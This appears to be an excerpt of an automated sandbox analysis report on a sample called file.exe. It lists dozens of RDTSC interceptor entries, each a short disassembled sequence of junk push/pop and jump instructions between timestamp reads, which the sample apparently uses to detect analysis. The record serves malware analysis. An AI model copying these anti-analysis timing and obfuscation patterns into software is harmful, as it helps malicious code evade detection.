                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F39F second address: 106F3BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84086DC797h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F3BA second address: 106F3C8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F3C8 second address: 106F3D2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84086DC786h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F666 second address: 106F66F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F66F second address: 106F675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 106F675 second address: 106F679 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10742FD second address: 1074319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC797h 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077FB4 second address: 1077FBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077528 second address: 107752C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107768D second address: 10776A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8408CC9F90h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776A6 second address: 10776DA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F84086DC786h 0x0000000f popad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jnl 00007F84086DC786h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F84086DC797h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10776DA second address: 10776EC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8408CC9F88h 0x00000008 jo 00007F8408CC9F9Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077B03 second address: 1077B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC795h 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F84086DC786h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077B26 second address: 1077B2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077B2A second address: 1077B30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077C9F second address: 1077CB9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8408CC9F94h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CB9 second address: 1077CC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CC0 second address: 1077CC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CC9 second address: 1077CCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1077CCD second address: 1077CD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A489 second address: 107A48E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A48E second address: 107A498 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8408CC9F92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107A498 second address: 107A49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081FEA second address: 1081FFA instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080374 second address: 1080379 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080640 second address: 1080646 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080646 second address: 108064A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108064A second address: 108064E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108064E second address: 1080654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080654 second address: 1080679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnp 00007F8408CC9F86h 0x0000000d pop ebx 0x0000000e popad 0x0000000f pushad 0x00000010 push ecx 0x00000011 je 00007F8408CC9F86h 0x00000017 pop ecx 0x00000018 jmp 00007F8408CC9F8Ah 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10807D7 second address: 10807E7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F84086DC788h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10807E7 second address: 10807ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10807ED second address: 1080823 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007F84086DC792h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edx 0x00000012 jnc 00007F84086DC793h 0x00000018 jmp 00007F84086DC78Dh 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080823 second address: 1080829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 108096D second address: 108097A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84086DC786h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080ADC second address: 1080AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080AE2 second address: 1080B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F84086DC796h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080B02 second address: 1080B15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F8408CC9F86h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080B15 second address: 1080B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080B1B second address: 1080B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8408CC9F96h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080CAC second address: 1080CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC78Ch 0x00000009 pop eax 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1080CC2 second address: 1080CDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8408CC9F92h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E32 second address: 1081E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E3D second address: 1081E53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007F8408CC9F88h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E53 second address: 1081E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E59 second address: 1081E5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E5E second address: 1081E75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84086DC793h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E75 second address: 1081E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1081E81 second address: 1081E85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FD8E second address: 107FD92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 107FD92 second address: 107FD96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10887E4 second address: 10887EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10887EA second address: 10887F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F84086DC786h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10887F4 second address: 10887F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10944BC second address: 10944C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10944C1 second address: 10944C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1094069 second address: 109406F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109406F second address: 109408A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F8408CC9F8Fh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10993CB second address: 10993CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098FC7 second address: 1098FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098FCC second address: 1098FD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F84086DC786h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098FD8 second address: 1098FDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1098FDC second address: 1098FE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EB00 second address: 109EB04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 109EB04 second address: 109EB22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F84086DC78Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F84086DC78Ah 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A58EC second address: 10A591C instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8408CC9F8Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007F8408CC9F86h 0x00000010 jmp 00007F8408CC9F98h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10A591C second address: 10A5920 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10ABB6C second address: 10ABB78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F8408CC9F86h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1899 second address: 10B189D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B189D second address: 10B18B5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8408CC9F92h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B18B5 second address: 10B18E7 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F84086DC786h 0x00000008 js 00007F84086DC786h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jne 00007F84086DC788h 0x00000019 jbe 00007F84086DC78Eh 0x0000001f pushad 0x00000020 jno 00007F84086DC786h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1B7C second address: 10B1B87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1B87 second address: 10B1B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1B8B second address: 10B1B9D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jnc 00007F8408CC9F86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1B9D second address: 10B1BC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F84086DC786h 0x0000000a jmp 00007F84086DC799h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B1BC1 second address: 10B1BCB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8408CC9F92h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2193 second address: 10B21A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84086DC78Bh 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B22D9 second address: 10B22DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2CAC second address: 10B2CB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F84086DC786h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2CB8 second address: 10B2CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2CBE second address: 10B2CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2CC3 second address: 10B2D04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8408CC9F91h 0x00000007 jng 00007F8408CC9F8Ch 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F8408CC9F8Ah 0x00000017 jmp 00007F8408CC9F94h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10B2D04 second address: 10B2D1F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F84086DC792h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BAA5F second address: 10BAA64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10BC001 second address: 10BC00B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FD2EC8 second address: FD2EDF instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8408CC9F8Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F8408CC9FAAh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7FA9 second address: 10C7FD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC78Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c jmp 00007F84086DC794h 0x00000011 pop eax 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7FD3 second address: 10C7FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F8408CC9F86h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7FDF second address: 10C7FE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10C7FE3 second address: 10C8001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F8408CC9F8Bh 0x0000000e pushad 0x0000000f popad 0x00000010 jbe 00007F8408CC9F86h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D99E6 second address: 10D99EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D99EF second address: 10D99F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10D99F7 second address: 10D99FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DBA56 second address: 10DBA62 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8408CC9F8Eh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB2AC second address: 10EB2B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB6DE second address: 10EB6EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB6EA second address: 10EB711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84086DC793h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F84086DC78Dh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EB711 second address: 10EB716 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBB20 second address: 10EBB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84086DC799h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F84086DC793h 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBB55 second address: 10EBB64 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F8408CC9F86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b pushad 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10EBB64 second address: 10EBB83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F84086DC796h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
